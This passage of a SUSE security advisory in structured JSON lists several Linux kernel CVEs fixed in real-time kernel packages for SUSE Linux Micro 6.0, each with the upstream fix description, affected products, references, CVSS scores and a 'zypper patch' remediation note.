"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68727",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68727"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: Fix uninit buffer allocated by __getname()\n\nFix uninit errors caused after buffer allocation given to \u0027de\u0027; by\ninitializing the buffer with zeroes. The fix was found by using KMSAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68727",
"url": "https://www.suse.com/security/cve/CVE-2025-68727"
},
{
"category": "external",
"summary": "SUSE Bug 1255568 for CVE-2025-68727",
"url": "https://bugzilla.suse.com/1255568"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68727"
},
{
"cve": "CVE-2025-68728",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68728"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nntfs3: fix uninit memory after failed mi_read in mi_format_new\n\nFix a KMSAN un-init bug found by syzkaller.\n\nntfs_get_bh() expects a buffer from sb_getblk(), that buffer may not be\nuptodate. We do not bring the buffer uptodate before setting it as\nuptodate. If the buffer were to not be uptodate, it could mean adding a\nbuffer with un-init data to the mi record. Attempting to load that record\nwill trigger KMSAN.\n\nAvoid this by setting the buffer as uptodate, if it\u0027s not already, by\noverwriting it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68728",
"url": "https://www.suse.com/security/cve/CVE-2025-68728"
},
{
"category": "external",
"summary": "SUSE Bug 1255539 for CVE-2025-68728",
"url": "https://bugzilla.suse.com/1255539"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68728"
},
{
"cve": "CVE-2025-68732",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68732"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpu: host1x: Fix race in syncpt alloc/free\n\nFix race condition between host1x_syncpt_alloc()\nand host1x_syncpt_put() by using kref_put_mutex()\ninstead of kref_put() + manual mutex locking.\n\nThis ensures no thread can acquire the\nsyncpt_mutex after the refcount drops to zero\nbut before syncpt_release acquires it.\nThis prevents races where syncpoints could\nbe allocated while still being cleaned up\nfrom a previous release.\n\nRemove explicit mutex locking in syncpt_release\nas kref_put_mutex() handles this atomically.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68732",
"url": "https://www.suse.com/security/cve/CVE-2025-68732"
},
{
"category": "external",
"summary": "SUSE Bug 1255688 for CVE-2025-68732",
"url": "https://bugzilla.suse.com/1255688"
},
{
"category": "external",
"summary": "SUSE Bug 1255689 for CVE-2025-68732",
"url": "https://bugzilla.suse.com/1255689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-68732"
},
{
"cve": "CVE-2025-68733",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68733"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmack: fix bug: unprivileged task can create labels\n\nIf an unprivileged task is allowed to relabel itself\n(/smack/relabel-self is not empty),\nit can freely create new labels by writing their\nnames into own /proc/PID/attr/smack/current\n\nThis occurs because do_setattr() imports\nthe provided label in advance,\nbefore checking \"relabel-self\" list.\n\nThis change ensures that the \"relabel-self\" list\nis checked before importing the label.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68733",
"url": "https://www.suse.com/security/cve/CVE-2025-68733"
},
{
"category": "external",
"summary": "SUSE Bug 1255615 for CVE-2025-68733",
"url": "https://bugzilla.suse.com/1255615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68733"
},
{
"cve": "CVE-2025-68734",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68734"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nisdn: mISDN: hfcsusb: fix memory leak in hfcsusb_probe()\n\nIn hfcsusb_probe(), the memory allocated for ctrl_urb gets leaked when\nsetup_instance() fails with an error code. Fix that by freeing the urb\nbefore freeing the hw structure. Also change the error paths to use the\ngoto ladder style.\n\nCompile tested only. Issue found using a prototype static analysis tool.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68734",
"url": "https://www.suse.com/security/cve/CVE-2025-68734"
},
{
"category": "external",
"summary": "SUSE Bug 1255538 for CVE-2025-68734",
"url": "https://bugzilla.suse.com/1255538"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68734"
},
{
"cve": "CVE-2025-68736",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68736"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlandlock: Fix handling of disconnected directories\n\nDisconnected files or directories can appear when they are visible and\nopened from a bind mount, but have been renamed or moved from the source\nof the bind mount in a way that makes them inaccessible from the mount\npoint (i.e. out of scope).\n\nPreviously, access rights tied to files or directories opened through a\ndisconnected directory were collected by walking the related hierarchy\ndown to the root of the filesystem, without taking into account the\nmount point because it couldn\u0027t be found. This could lead to\ninconsistent access results, potential access right widening, and\nhard-to-debug renames, especially since such paths cannot be printed.\n\nFor a sandboxed task to create a disconnected directory, it needs to\nhave write access (i.e. FS_MAKE_REG, FS_REMOVE_FILE, and FS_REFER) to\nthe underlying source of the bind mount, and read access to the related\nmount point. Because a sandboxed task cannot acquire more access\nrights than those defined by its Landlock domain, this could lead to\ninconsistent access rights due to missing permissions that should be\ninherited from the mount point hierarchy, while inheriting permissions\nfrom the filesystem hierarchy hidden by this mount point instead.\n\nLandlock now handles files and directories opened from disconnected\ndirectories by taking into account the filesystem hierarchy when the\nmount point is not found in the hierarchy walk, and also always taking\ninto account the mount point from which these disconnected directories\nwere opened. This ensures that a rename is not allowed if it would\nwiden access rights [1].\n\nThe rationale is that, even if disconnected hierarchies might not be\nvisible or accessible to a sandboxed task, relying on the collected\naccess rights from them improves the guarantee that access rights will\nnot be widened during a rename because of the access right comparison\nbetween the source and the destination (see LANDLOCK_ACCESS_FS_REFER).\nIt may look like this would grant more access on disconnected files and\ndirectories, but the security policies are always enforced for all the\nevaluated hierarchies. This new behavior should be less surprising to\nusers and safer from an access control perspective.\n\nRemove a wrong WARN_ON_ONCE() canary in collect_domain_accesses() and\nfix the related comment.\n\nBecause opened files have their access rights stored in the related file\nsecurity properties, there is no impact for disconnected or unlinked\nfiles.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68736",
"url": "https://www.suse.com/security/cve/CVE-2025-68736"
},
{
"category": "external",
"summary": "SUSE Bug 1255698 for CVE-2025-68736",
"url": "https://bugzilla.suse.com/1255698"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68736"
},
{
"cve": "CVE-2025-68740",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68740"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nima: Handle error code returned by ima_filter_rule_match()\n\nIn ima_match_rules(), if ima_filter_rule_match() returns -ENOENT due to\nthe rule being NULL, the function incorrectly skips the \u0027if (!rc)\u0027 check\nand sets \u0027result = true\u0027. The LSM rule is considered a match, causing\nextra files to be measured by IMA.\n\nThis issue can be reproduced in the following scenario:\nAfter unloading the SELinux policy module via \u0027semodule -d\u0027, if an IMA\nmeasurement is triggered before ima_lsm_rules is updated,\nin ima_match_rules(), the first call to ima_filter_rule_match() returns\n-ESTALE. This causes the code to enter the \u0027if (rc == -ESTALE \u0026\u0026\n!rule_reinitialized)\u0027 block, perform ima_lsm_copy_rule() and retry. In\nima_lsm_copy_rule(), since the SELinux module has been removed, the rule\nbecomes NULL, and the second call to ima_filter_rule_match() returns\n-ENOENT. This bypasses the \u0027if (!rc)\u0027 check and results in a false match.\n\nCall trace:\n selinux_audit_rule_match+0x310/0x3b8\n security_audit_rule_match+0x60/0xa0\n ima_match_rules+0x2e4/0x4a0\n ima_match_policy+0x9c/0x1e8\n ima_get_action+0x48/0x60\n process_measurement+0xf8/0xa98\n ima_bprm_check+0x98/0xd8\n security_bprm_check+0x5c/0x78\n search_binary_handler+0x6c/0x318\n exec_binprm+0x58/0x1b8\n bprm_execve+0xb8/0x130\n do_execveat_common.isra.0+0x1a8/0x258\n __arm64_sys_execve+0x48/0x68\n invoke_syscall+0x50/0x128\n el0_svc_common.constprop.0+0xc8/0xf0\n do_el0_svc+0x24/0x38\n el0_svc+0x44/0x200\n el0t_64_sync_handler+0x100/0x130\n el0t_64_sync+0x3c8/0x3d0\n\nFix this by changing \u0027if (!rc)\u0027 to \u0027if (rc \u003c= 0)\u0027 to ensure that error\ncodes like -ENOENT do not bypass the check and accidentally result in a\nsuccessful match.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68740",
"url": "https://www.suse.com/security/cve/CVE-2025-68740"
},
{
"category": "external",
"summary": "SUSE Bug 1255812 for CVE-2025-68740",
"url": "https://bugzilla.suse.com/1255812"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68740"
},
{
"cve": "CVE-2025-68742",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68742"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix invalid prog-\u003estats access when update_effective_progs fails\n\nSyzkaller triggers an invalid memory access issue following fault\ninjection in update_effective_progs. The issue can be described as\nfollows:\n\n__cgroup_bpf_detach\n update_effective_progs\n compute_effective_progs\n bpf_prog_array_alloc \u003c-- fault inject\n purge_effective_progs\n /* change to dummy_bpf_prog */\n array-\u003eitems[index] = \u0026dummy_bpf_prog.prog\n\n---softirq start---\n__do_softirq\n ...\n __cgroup_bpf_run_filter_skb\n __bpf_prog_run_save_cb\n bpf_prog_run\n stats = this_cpu_ptr(prog-\u003estats)\n /* invalid memory access */\n flags = u64_stats_update_begin_irqsave(\u0026stats-\u003esyncp)\n---softirq end---\n\n static_branch_dec(\u0026cgroup_bpf_enabled_key[atype])\n\nThe reason is that fault injection caused update_effective_progs to fail\nand then changed the original prog into dummy_bpf_prog.prog in\npurge_effective_progs. Then a softirq came, and accessing the members of\ndummy_bpf_prog.prog in the softirq triggers invalid mem access.\n\nTo fix it, skip updating stats when stats is NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68742",
"url": "https://www.suse.com/security/cve/CVE-2025-68742"
},
{
"category": "external",
"summary": "SUSE Bug 1255707 for CVE-2025-68742",
"url": "https://bugzilla.suse.com/1255707"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68742"
},
{
"cve": "CVE-2025-68744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Free special fields when update [lru_,]percpu_hash maps\n\nAs [lru_,]percpu_hash maps support BPF_KPTR_{REF,PERCPU}, missing\ncalls to \u0027bpf_obj_free_fields()\u0027 in \u0027pcpu_copy_value()\u0027 could cause the\nmemory referenced by BPF_KPTR_{REF,PERCPU} fields to be held until the\nmap gets freed.\n\nFix this by calling \u0027bpf_obj_free_fields()\u0027 after\n\u0027copy_map_value[,_long]()\u0027 in \u0027pcpu_copy_value()\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68744",
"url": "https://www.suse.com/security/cve/CVE-2025-68744"
},
{
"category": "external",
"summary": "SUSE Bug 1255709 for CVE-2025-68744",
"url": "https://bugzilla.suse.com/1255709"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-68744"
},
{
"cve": "CVE-2025-68746",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68746"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: tegra210-quad: Fix timeout handling\n\nWhen the CPU that the QSPI interrupt handler runs on (typically CPU 0)\nis excessively busy, it can lead to rare cases of the IRQ thread not\nrunning before the transfer timeout is reached.\n\nWhile handling the timeouts, any pending transfers are cleaned up and\nthe message that they correspond to is marked as failed, which leaves\nthe curr_xfer field pointing at stale memory.\n\nTo avoid this, clear curr_xfer to NULL upon timeout and check for this\ncondition when the IRQ thread is finally run.\n\nWhile at it, also make sure to clear interrupts on failure so that new\ninterrupts can be run.\n\nA better, more involved, fix would move the interrupt clearing into a\nhard IRQ handler. Ideally we would also want to signal that the IRQ\nthread no longer needs to be run after the timeout is hit to avoid the\nextra check for a valid transfer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68746",
"url": "https://www.suse.com/security/cve/CVE-2025-68746"
},
{
"category": "external",
"summary": "SUSE Bug 1255722 for CVE-2025-68746",
"url": "https://bugzilla.suse.com/1255722"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
